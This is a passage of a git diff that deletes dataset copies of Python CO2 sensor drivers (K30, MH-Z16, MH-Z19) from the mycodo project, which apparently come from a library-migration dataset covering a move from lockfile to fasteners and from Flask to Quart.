""" Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ K30 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the K30's CO2 concentration in ppmv via UART""" - self._co2 = None - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xFE\x44\x00\x08\x02\x9F\x25") - time.sleep(.01) - resp = self.ser.read(7) - if len(resp) != 0: - high = ord(resp[3]) - low = ord(resp[4]) - co2 = (high * 256) + low - return co2 - return None - - def read(self): - """ - Takes a reading from the K30 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - if not self.serial_device: # Don't measure if device isn't validated - return None - - lock = LockFile(self.k30_lock_file) - try: - # Acquire lock on K30 to ensure more than one read isn't - # being attempted at once. - while not lock.i_am_locking(): - try: # wait 60 seconds before breaking lock - lock.acquire(timeout=60) - except Exception as e: - self.logger.error( - "{cls} 60 second timeout, {lock} lock broken: " - "{err}".format( - cls=type(self).__name__, - lock=self.k30_lock_file, - err=e)) - lock.break_lock() - lock.acquire() - self._co2 = self.get_measurement() - lock.release() - if self._co2 is None: - return 1 - return # success - no errors - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - lock.release() - return 1 diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.target.py deleted file mode 100644 index badc8c0..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.target.py +++ /dev/null @@ -1,120 +0,0 @@ -# coding=utf-8 - -import fasteners -import logging -import serial -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class K30Sensor(AbstractSensor): - """ A sensor support class that monitors the K30's CO2 concentration """ - - def __init__(self, device_loc, baud_rate=9600): - super(K30Sensor, self).__init__() - self.logger = logging.getLogger( - "mycodo.sensors.k30.{dev}".format(dev=device_loc.replace('/', ''))) - self.k30_lock_file = None - self._co2 = 0 - - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - self.k30_lock_file = "/var/lock/sen-k30-{}".format(device_loc.replace('/', '')) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". ' - 'Check the device location is correct.'.format( - dev=device_loc)) - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - """ Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ K30 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the K30's CO2 concentration in ppmv via UART""" - self._co2 = None - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xFE\x44\x00\x08\x02\x9F\x25") - time.sleep(.01) - resp = self.ser.read(7) - if len(resp) != 0: - high = ord(resp[3]) - low = ord(resp[4]) - co2 = (high * 256) + low - return co2 - return None - - def read(self): - """ - Takes a reading from the K30 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - if not self.serial_device: # Don't measure if device isn't validated - return None - - try: - lock = fasteners.InterProcessLock(self.k30_lock_file) - lock_acquired = False - - for i in range(600): - lock_acquired = lock.acquire(blocking=False) - if lock_acquired: - break - else: - time.sleep(0.1) - - if lock_acquired: - self._co2 = self.get_measurement() - lock.release() - else: - self.logger.error("Could not acquire K30 lock") - - if self._co2 is None: - return 1 - return # success - no errors - - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - return 1 diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.diff deleted file mode 100644 index 89cbb09..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.diff +++ /dev/null @@ -1,77 +0,0 @@ -diff --git a/mycodo/sensors/mh_z16.py b/mycodo/sensors/mh_z16.py - index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644 - --- a/mycodo/sensors/mh_z16.py - +++ b/mycodo/sensors/mh_z16.py -@@ -19,7 +19,7 @@ - # The above copyright notice and this permission notice shall be - # included in all copies or substantial portions of the Software. - --from lockfile import LockFile -+import fasteners - import logging - import serial - import smbus -@@ -36,7 +36,7 @@ class MHZ16Sensor(AbstractSensor): - def __init__(self, interface, device_loc=None, baud_rate=None, - i2c_address=None, i2c_bus=None): - super(MHZ16Sensor, self).__init__() -- self.k30_lock_file = None -+ self.mhz16_lock_file = None - self._co2 = 0 - self.interface = interface - -@@ -47,8 +47,7 @@ class MHZ16Sensor(AbstractSensor): - self.serial_device = is_device(device_loc) - if self.serial_device: - try: -- self.k30_lock_file = "/var/lock/sen-mhz16-{}".format(device_loc.replace('/', '')) -- self.lock = LockFile(self.k30_lock_file) -+ self.mhz16_lock_file = "/var/lock/sen-mhz16-{}".format(device_loc.replace('/', '')) - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) -@@ -150,20 +149,21 @@ class MHZ16Sensor(AbstractSensor): - - # Acquire lock on MHZ16 to ensure more than one read isn't - # being attempted at once on the same interface -- while not self.lock.i_am_locking(): -- try: # wait 60 seconds before breaking lock -- self.lock.acquire(timeout=60) -- except Exception as e: -- self.logger.error( -- "{cls} 60 second timeout, {lock} lock broken: " -- "{err}".format( -- cls=type(self).__name__, -- lock=self.k30_lock_file, -- err=e)) -- self.lock.break_lock() -- self.lock.acquire() -- self._co2 = self.get_measurement() -- self.lock.release() -+ lock = fasteners.InterProcessLock(self.mhz16_lock_file) -+ lock_acquired = False -+ -+ for i in range(600): -+ lock_acquired = lock.acquire(blocking=False) -+ if lock_acquired: -+ break -+ else: -+ time.sleep(0.1) -+ -+ if lock_acquired: -+ self._co2 = self.get_measurement() -+ lock.release() -+ else: -+ self.logger.error("Could not acquire MHZ16 lock") - - elif self.interface == 'I2C': - self._co2 = self.get_measurement() -@@ -176,8 +176,6 @@ class MHZ16Sensor(AbstractSensor): - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) -- if self.interface == 'UART': -- self.lock.release() - return 1 - - def begin(self): diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.source.py deleted file mode 100644 index e8d2b53..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.source.py +++ /dev/null @@ -1,240 +0,0 @@ -# coding=utf-8 - -# I2C code created in part by: -# Author: Tiequan Shao (info@sandboxelectronics.com) -# License: CC BY-NC-SA 3.0 -# -# UART Code created in part by: -# Author: Zion Orent -# Copyright (c) 2015 Intel Corporation. -# -# Permission is hereby granted, free of charge, to any person obtaining -# a copy of this software and associated documentation files (the -# "Software"), to deal in the Software without restriction, including -# without limitation the rights to use, copy, modify, merge, publish, -# distribute, sublicense, and/or sell copies of the Software, and to -# permit persons to whom the Software is furnished to do so, subject to -# the following conditions: -# -# The above copyright notice and this permission notice shall be -# included in all copies or substantial portions of the Software. - -from lockfile import LockFile -import logging -import serial -import smbus -import struct -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class MHZ16Sensor(AbstractSensor): - """ A sensor support class that monitors the MH-Z16's CO2 concentration """ - - def __init__(self, interface, device_loc=None, baud_rate=None, - i2c_address=None, i2c_bus=None): - super(MHZ16Sensor, self).__init__() - self.k30_lock_file = None - self._co2 = 0 - self.interface = interface - - if self.interface == 'UART': - self.logger = logging.getLogger( - "mycodo.sensors.mhz16.{dev}".format(dev=device_loc.replace('/', ''))) - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.k30_lock_file = "/var/lock/sen-mhz16-{}".format(device_loc.replace('/', '')) - self.lock = LockFile(self.k30_lock_file) - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". ' - 'Check the device location is correct.'.format( - dev=device_loc)) - - elif self.interface == 'I2C': - self.logger = logging.getLogger( - "mycodo.sensors.mhz16.{dev}".format(dev=i2c_address)) - self.cmd_measure = [0xFF, 0x01, 0x9C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63] - self.IOCONTROL = 0X0E << 3 - self.FCR = 0X02 << 3 - self.LCR = 0X03 << 3 - self.DLL = 0x00 << 3 - self.DLH = 0X01 << 3 - self.THR = 0X00 << 3 - self.RHR = 0x00 << 3 - self.TXLVL = 0X08 << 3 - self.RXLVL = 0X09 << 3 - self.i2c_address = i2c_address - self.i2c = smbus.SMBus(i2c_bus) - self.begin() - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - """ Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ MH-Z16 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the MH-Z16's CO2 concentration in ppmv via UART""" - self._co2 = None - - if self.interface == 'UART': - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xff\x01\x86\x00\x00\x00\x00\x00\x79") - time.sleep(.01) - resp = self.ser.read(9) - if len(resp) != 0: - high_level = struct.unpack('B', resp[2])[0] - low_level = struct.unpack('B', resp[3])[0] - co2 = high_level * 256 + low_level - return co2 - - elif self.interface == 'I2C': - self.write_register(self.FCR, 0x07) - self.send(self.cmd_measure) - try: - co2 = self.parse(self.receive()) - except Exception: - co2 = None - return co2 - - return None - - def read(self): - """ - Takes a reading from the MH-Z16 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - try: - if self.interface == 'UART': - if not self.serial_device: # Don't measure if device isn't validated - return None - - # Acquire lock on MHZ16 to ensure more than one read isn't - # being attempted at once on the same interface - while not self.lock.i_am_locking(): - try: # wait 60 seconds before breaking lock - self.lock.acquire(timeout=60) - except Exception as e: - self.logger.error( - "{cls} 60 second timeout, {lock} lock broken: " - "{err}".format( - cls=type(self).__name__, - lock=self.k30_lock_file, - err=e)) - self.lock.break_lock() - self.lock.acquire() - self._co2 = self.get_measurement() - self.lock.release() - - elif self.interface == 'I2C': - self._co2 = self.get_measurement() - - if self._co2 is None: - return 1 - return # success - no errors - - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - if self.interface == 'UART': - self.lock.release() - return 1 - - def begin(self): - try: - self.write_register(self.IOCONTROL, 0x08) - except IOError: - pass - - self.write_register(self.FCR, 0x07) - self.write_register(self.LCR, 0x83) - self.write_register(self.DLL, 0x60) - self.write_register(self.DLH, 0x00) - self.write_register(self.LCR, 0x03) - - @staticmethod - def parse(response): - checksum = 0 - - if len(response) < 9: - return None - - for i in range(0, 9): - checksum += response[i] - - if response[0] == 0xFF: - if response[1] == 0x9C: - if checksum % 256 == 0xFF: - return (response[2] << 24) + (response[3] << 16) + (response[4] << 8) + response[5] - - return None - - def read_register(self, reg_addr): - time.sleep(0.01) - return self.i2c.read_byte_data(self.i2c_address, reg_addr) - - def write_register(self, reg_addr, val): - time.sleep(0.01) - self.i2c.write_byte_data(self.i2c_address, reg_addr, val) - - def send(self, command): - if self.read_register(self.TXLVL) >= len(command): - self.i2c.write_i2c_block_data(self.i2c_address, self.THR, command) - - def receive(self): - n = 9 - buf = [] - start = time.clock() - - while n > 0: - rx_level = self.read_register(self.RXLVL) - - if rx_level > n: - rx_level = n - - buf.extend(self.i2c.read_i2c_block_data(self.i2c_address, self.RHR, rx_level)) - n = n - rx_level - - if time.clock() - start > 0.2: - break - return buf \ No newline at end of file diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.target.py deleted file mode 100644 index 511486a..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.target.py +++ /dev/null @@ -1,238 +0,0 @@ -# coding=utf-8 - -# I2C code created in part by: -# Author: Tiequan Shao (info@sandboxelectronics.com) -# License: CC BY-NC-SA 3.0 -# -# UART Code created in part by: -# Author: Zion Orent -# Copyright (c) 2015 Intel Corporation. -# -# Permission is hereby granted, free of charge, to any person obtaining -# a copy of this software and associated documentation files (the -# "Software"), to deal in the Software without restriction, including -# without limitation the rights to use, copy, modify, merge, publish, -# distribute, sublicense, and/or sell copies of the Software, and to -# permit persons to whom the Software is furnished to do so, subject to -# the following conditions: -# -# The above copyright notice and this permission notice shall be -# included in all copies or substantial portions of the Software. - -import fasteners -import logging -import serial -import smbus -import struct -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class MHZ16Sensor(AbstractSensor): - """ A sensor support class that monitors the MH-Z16's CO2 concentration """ - - def __init__(self, interface, device_loc=None, baud_rate=None, - i2c_address=None, i2c_bus=None): - super(MHZ16Sensor, self).__init__() - self.mhz16_lock_file = None - self._co2 = 0 - self.interface = interface - - if self.interface == 'UART': - self.logger = logging.getLogger( - "mycodo.sensors.mhz16.{dev}".format(dev=device_loc.replace('/', ''))) - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.mhz16_lock_file = "/var/lock/sen-mhz16-{}".format(device_loc.replace('/', '')) - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". ' - 'Check the device location is correct.'.format( - dev=device_loc)) - - elif self.interface == 'I2C': - self.logger = logging.getLogger( - "mycodo.sensors.mhz16.{dev}".format(dev=i2c_address)) - self.cmd_measure = [0xFF, 0x01, 0x9C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63] - self.IOCONTROL = 0X0E << 3 - self.FCR = 0X02 << 3 - self.LCR = 0X03 << 3 - self.DLL = 0x00 << 3 - self.DLH = 0X01 << 3 - self.THR = 0X00 << 3 - self.RHR = 0x00 << 3 - self.TXLVL = 0X08 << 3 - self.RXLVL = 0X09 << 3 - self.i2c_address = i2c_address - self.i2c = smbus.SMBus(i2c_bus) - self.begin() - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - """ Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ MH-Z16 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the MH-Z16's CO2 concentration in ppmv via UART""" - self._co2 = None - - if self.interface == 'UART': - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xff\x01\x86\x00\x00\x00\x00\x00\x79") - time.sleep(.01) - resp = self.ser.read(9) - if len(resp) != 0: - high_level = struct.unpack('B', resp[2])[0] - low_level = struct.unpack('B', resp[3])[0] - co2 = high_level * 256 + low_level - return co2 - - elif self.interface == 'I2C': - self.write_register(self.FCR, 0x07) - self.send(self.cmd_measure) - try: - co2 = self.parse(self.receive()) - except Exception: - co2 = None - return co2 - - return None - - def read(self): - """ - Takes a reading from the MH-Z16 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - try: - if self.interface == 'UART': - if not self.serial_device: # Don't measure if device isn't validated - return None - - # Acquire lock on MHZ16 to ensure more than one read isn't - # being attempted at once on the same interface - lock = fasteners.InterProcessLock(self.mhz16_lock_file) - lock_acquired = False - - for i in range(600): - lock_acquired = lock.acquire(blocking=False) - if lock_acquired: - break - else: - time.sleep(0.1) - - if lock_acquired: - self._co2 = self.get_measurement() - lock.release() - else: - self.logger.error("Could not acquire MHZ16 lock") - - elif self.interface == 'I2C': - self._co2 = self.get_measurement() - - if self._co2 is None: - return 1 - return # success - no errors - - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - return 1 - - def begin(self): - try: - self.write_register(self.IOCONTROL, 0x08) - except IOError: - pass - - self.write_register(self.FCR, 0x07) - self.write_register(self.LCR, 0x83) - self.write_register(self.DLL, 0x60) - self.write_register(self.DLH, 0x00) - self.write_register(self.LCR, 0x03) - - @staticmethod - def parse(response): - checksum = 0 - - if len(response) < 9: - return None - - for i in range(0, 9): - checksum += response[i] - - if response[0] == 0xFF: - if response[1] == 0x9C: - if checksum % 256 == 0xFF: - return (response[2] << 24) + (response[3] << 16) + (response[4] << 8) + response[5] - - return None - - def read_register(self, reg_addr): - time.sleep(0.01) - return self.i2c.read_byte_data(self.i2c_address, reg_addr) - - def write_register(self, reg_addr, val): - time.sleep(0.01) - self.i2c.write_byte_data(self.i2c_address, reg_addr, val) - - def send(self, command): - if self.read_register(self.TXLVL) >= len(command): - self.i2c.write_i2c_block_data(self.i2c_address, self.THR, command) - - def receive(self): - n = 9 - buf = [] - start = time.clock() - - while n > 0: - rx_level = self.read_register(self.RXLVL) - - if rx_level > n: - rx_level = n - - buf.extend(self.i2c.read_i2c_block_data(self.i2c_address, self.RHR, rx_level)) - n = n - rx_level - - if time.clock() - start > 0.2: - break - return buf \ No newline at end of file diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.diff deleted file mode 100644 index ff87b9f..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.diff +++ /dev/null @@ -1,75 +0,0 @@ -diff --git a/mycodo/sensors/mh_z19.py b/mycodo/sensors/mh_z19.py - index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644 - --- a/mycodo/sensors/mh_z19.py - +++ b/mycodo/sensors/mh_z19.py -@@ -1,6 +1,6 @@ - # coding=utf-8 - --from lockfile import LockFile -+import fasteners - import logging - import serial - import time -@@ -16,7 +16,7 @@ class MHZ19Sensor(AbstractSensor): - super(MHZ19Sensor, self).__init__() - self.logger = logging.getLogger( - "mycodo.sensors.mhz19.{dev}".format(dev=device_loc.replace('/', ''))) -- self.k30_lock_file = None -+ self.mhz19_lock_file = None - self._co2 = 0 - - # Check if device is valid -@@ -26,7 +26,7 @@ class MHZ19Sensor(AbstractSensor): - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) -- self.k30_lock_file = "/var/lock/sen-mhz19-{}".format(device_loc.replace('/', '')) -+ self.mhz19_lock_file = "/var/lock/sen-mhz19-{}".format(device_loc.replace('/', '')) - except serial.SerialException: - self.logger.exception('Opening serial') - else: -@@ -92,27 +92,29 @@ class MHZ19Sensor(AbstractSensor): - if not self.serial_device: # Don't measure if device isn't validated - return None - -- lock = LockFile(self.k30_lock_file) - try: - # Acquire lock on MHZ19 to ensure more than one read isn't - # being attempted at once. -- while not lock.i_am_locking(): -- try: # wait 60 seconds before breaking lock -- lock.acquire(timeout=60) -- except Exception as e: -- self.logger.error( -- "{cls} 60 second timeout, {lock} lock broken: " -- "{err}".format( -- cls=type(self).__name__, -- lock=self.k30_lock_file, -- err=e)) -- lock.break_lock() -- lock.acquire() -- self._co2 = self.get_measurement() -- lock.release() -+ lock = fasteners.InterProcessLock(self.mhz19_lock_file) -+ lock_acquired = False -+ -+ for i in range(600): -+ lock_acquired = lock.acquire(blocking=False) -+ if lock_acquired: -+ break -+ else: -+ time.sleep(0.1) -+ -+ if lock_acquired: -+ self._co2 = self.get_measurement() -+ lock.release() -+ else: -+ self.logger.error("Could not acquire MHZ19 lock") -+ - if self._co2 is None: - return 1 - return # success - no errors -+ - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.source.py deleted file mode 100644 index 2176b4e..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.source.py +++ /dev/null @@ -1,121 +0,0 @@ -# coding=utf-8 - -from lockfile import LockFile -import logging -import serial -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class MHZ19Sensor(AbstractSensor): - """ A sensor support class that monitors the MH-Z19's CO2 concentration """ - - def __init__(self, device_loc, baud_rate=9600): - super(MHZ19Sensor, self).__init__() - self.logger = logging.getLogger( - "mycodo.sensors.mhz19.{dev}".format(dev=device_loc.replace('/', ''))) - self.k30_lock_file = None - self._co2 = 0 - - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - self.k30_lock_file = "/var/lock/sen-mhz19-{}".format(device_loc.replace('/', '')) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". ' - 'Check the device location is correct.'.format( - dev=device_loc)) - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - """ Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ MH-Z19 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the MH-Z19's CO2 concentration in ppmv via UART""" - self._co2 = None - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xff\x01\x86\x00\x00\x00\x00\x00\x79") - time.sleep(.01) - resp = self.ser.read(9) - if len(resp) != 0: - high = ord(resp[2]) - low = ord(resp[3]) - co2 = (high * 256) + low - return co2 - return None - - def read(self): - """ - Takes a reading from the MH-Z19 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - if not self.serial_device: # Don't measure if device isn't validated - return None - - lock = LockFile(self.k30_lock_file) - try: - # Acquire lock on MHZ19 to ensure more than one read isn't - # being attempted at once. - while not lock.i_am_locking(): - try: # wait 60 seconds before breaking lock - lock.acquire(timeout=60) - except Exception as e: - self.logger.error( - "{cls} 60 second timeout, {lock} lock broken: " - "{err}".format( - cls=type(self).__name__, - lock=self.k30_lock_file, - err=e)) - lock.break_lock() - lock.acquire() - self._co2 = self.get_measurement() - lock.release() - if self._co2 is None: - return 1 - return # success - no errors - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - lock.release() - return 1 diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.target.py deleted file mode 100644 index cb747f2..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.target.py +++ /dev/null @@ -1,123 +0,0 @@ -# coding=utf-8 - -import fasteners -import logging -import serial -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class MHZ19Sensor(AbstractSensor): - """ A sensor support class that monitors the MH-Z19's CO2 concentration """ - - def __init__(self, device_loc, baud_rate=9600): - super(MHZ19Sensor, self).__init__() - self.logger = logging.getLogger( - "mycodo.sensors.mhz19.{dev}".format(dev=device_loc.replace('/', ''))) - self.mhz19_lock_file = None - self._co2 = 0 - - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - self.mhz19_lock_file = "/var/lock/sen-mhz19-{}".format(device_loc.replace('/', '')) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". ' - 'Check the device location is correct.'.format( - dev=device_loc)) - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - """ Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ MH-Z19 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the MH-Z19's CO2 concentration in ppmv via UART""" - self._co2 = None - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xff\x01\x86\x00\x00\x00\x00\x00\x79") - time.sleep(.01) - resp = self.ser.read(9) - if len(resp) != 0: - high = ord(resp[2]) - low = ord(resp[3]) - co2 = (high * 256) + low - return co2 - return None - - def read(self): - """ - Takes a reading from the MH-Z19 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - if not self.serial_device: # Don't measure if device isn't validated - return None - - try: - # Acquire lock on MHZ19 to ensure more than one read isn't - # being attempted at once. - lock = fasteners.InterProcessLock(self.mhz19_lock_file) - lock_acquired = False - - for i in range(600): - lock_acquired = lock.acquire(blocking=False) - if lock_acquired: - break - else: - time.sleep(0.1) - - if lock_acquired: - self._co2 = self.get_measurement() - lock.release() - else: - self.logger.error("Could not acquire MHZ19 lock") - - if self._co2 is None: - return 1 - return # success - no errors - - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - lock.release() - return 1 diff --git a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.diff b/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.diff deleted file mode 100644 index 2b3f1d2..0000000 --- a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.diff +++ /dev/null @@ -1,37 +0,0 @@ -diff --git a/microservices/projection_image/server.py b/microservices/projection_image/server.py - index d302125613445f5fa55545c427c74bcbc5773722..db7f1321e13b5386f94670537aa49943f0f0cec9 100644 - --- a/microservices/projection_image/server.py - +++ b/microservices/projection_image/server.py -@@ -1,4 +1,4 @@ --from flask import jsonify, request, Flask -+from quart import jsonify, request, Quart - import os - from projection import SparkManager, MongoOperations, \ - ProjectionRequestValidator -@@ -30,7 +30,7 @@ MESSAGE_CREATED_FILE = "created_file" - - FIRST_ARGUMENT = 0 - --app = Flask(__name__) -+app = Quart(__name__) - - - def collection_database_url( -@@ -49,7 +49,7 @@ def collection_database_url( - - - @app.route("/projections", methods=[POST]) --def create_projection(): -+async def create_projection(): - database = MongoOperations( - os.environ[DATABASE_URL] + "/?replicaSet=" + os.environ[ - DATABASE_REPLICA_SET], -@@ -109,7 +109,7 @@ def create_projection(): - - projection_fields.append(DOCUMENT_ID) - -- spark_manager.projection( -+ await spark_manager.projection( - parent_filename, request.json[PROJECTION_FILENAME_NAME], - projection_fields - ) diff --git a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.source.py b/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.source.py deleted file mode 100644 index e444a5b..0000000 --- a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.source.py +++ /dev/null @@ -1,127 +0,0 @@ -from flask import jsonify, request, Flask -import os -from projection import SparkManager, MongoOperations, \ - ProjectionRequestValidator - -HTTP_STATUS_CODE_SUCESS_CREATED = 201 -HTTP_STATUS_CODE_CONFLICT = 409 -HTTP_STATUS_CODE_NOT_ACCEPTABLE = 406 - -PROJECTION_HOST_IP = "PROJECTION_HOST_IP" 